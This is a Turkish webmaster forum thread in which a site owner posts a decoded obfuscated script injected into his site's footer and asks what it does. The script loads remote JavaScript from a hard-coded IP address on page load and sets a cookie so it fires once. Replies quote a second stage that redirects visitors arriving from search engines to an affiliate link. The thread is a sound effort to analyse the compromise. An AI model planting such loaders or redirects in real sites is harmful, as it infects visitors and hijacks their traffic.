0
Kayıt Ol

Bu Javascript kodu ne işe yarıyor ?

7

930

  • 02-01-2014, 00:35:33
    #1
    Oğuz
    Oğuz
    Merhaba arkadaşlar,

    bugün sitemin footerına şifreli bir javascript kod eklenmiş çevirdim kodlar aynen şöyle ;

    
<script language="javascript">
document.write( unescape( '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
     var head=document.getElementsByTagName('head')[0]
      var script=document.createElement('script')
       script.setAttribute('type', 'text/javascript')
       script.setAttribute('src', "http://91.239.15.61/google.js")
       head.appendChild(script)
}
}

function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

window.onload = function()
{
redirect();
createCookie('doRedirect','true','999');
}
//-->
</script>
</head>

<body>
</body>
</html>'));
</script>
    fikri olan ?
  • 02-01-2014, 01:16:46
    #2
    ArneLd
    ArneLd
    Sitende açık mı var hacı ?
  • 02-01-2014, 01:24:25
    #3
    Albos
    Albos
    Üyeliği durduruldu
    http://91.239.15.61/google.js virus haci
  • 02-01-2014, 01:55:13
    #4
    karacoder
    karacoder
    head'e kendi kodunu yerleştiriyor. kaynakta head tag'leri arasında görünmesi lazım.
    kaynağı decode etmiş içinde ne var bilmiyorum ama, sitene girenlerin çerezlerini alıyor galiba. çerezleri okuyan ve çerez oluşturan fonksiyon var çünkü. çerez oluşturan fonksiyon her sayfa yüklendiğinde çalışıyor.
  • 03-01-2014, 15:13:11
    #5
    anti236
    anti236
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Artı rusya lokasyonlu olarak gözüküyor
  • 05-01-2014, 20:39:14
    #6
    OriqinaL
    OriqinaL
    Alıntı
    "referrer","google","yahoo","bing","yandex","baidu ","gigablast","soso","blekko","exalead","sogou","d uckduckgo","volunia","length","indexOf","location" ,"http://91.239.15.61/g.php","cookie"," ","=",";","substring","getDate","setDate",""," ; expires=","toUTCString","referrerRedirectCookie"," do not redirect"];
    epey işlemiş. reklam firmasına gidiyor kodlar. bir nevi senin sitene referans lar ile gelenleri yönlendiriyor.
  • 11-01-2014, 09:42:03
    #7
    Oğuz
    Oğuz
    Eyvallah hacılar cevaplarınız için.
  • 12-01-2014, 09:59:36
    #8
    WTF
    WTF
    Alıntı
    var _0xe2b8 = ["referrer", "google", "yahoo", "bing", "yandex", "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia", "length", "indexOf", "location", "http://91.239.15.61/g.php", "cookie", " ", "=", ";", "substring", "getDate", "setDate", "", "; expires=", "toUTCString", "referrerRedirectCookie", "do not redirect"];
    http://91.239.15.61/g.php
    Alıntı
    <meta HTTP-EQUIV="REFRESH" content="0; url=http://fa02e4011kwko1h3u0relhtgvd.hop.clickbank.net/?tid=LOVE">
    clickbank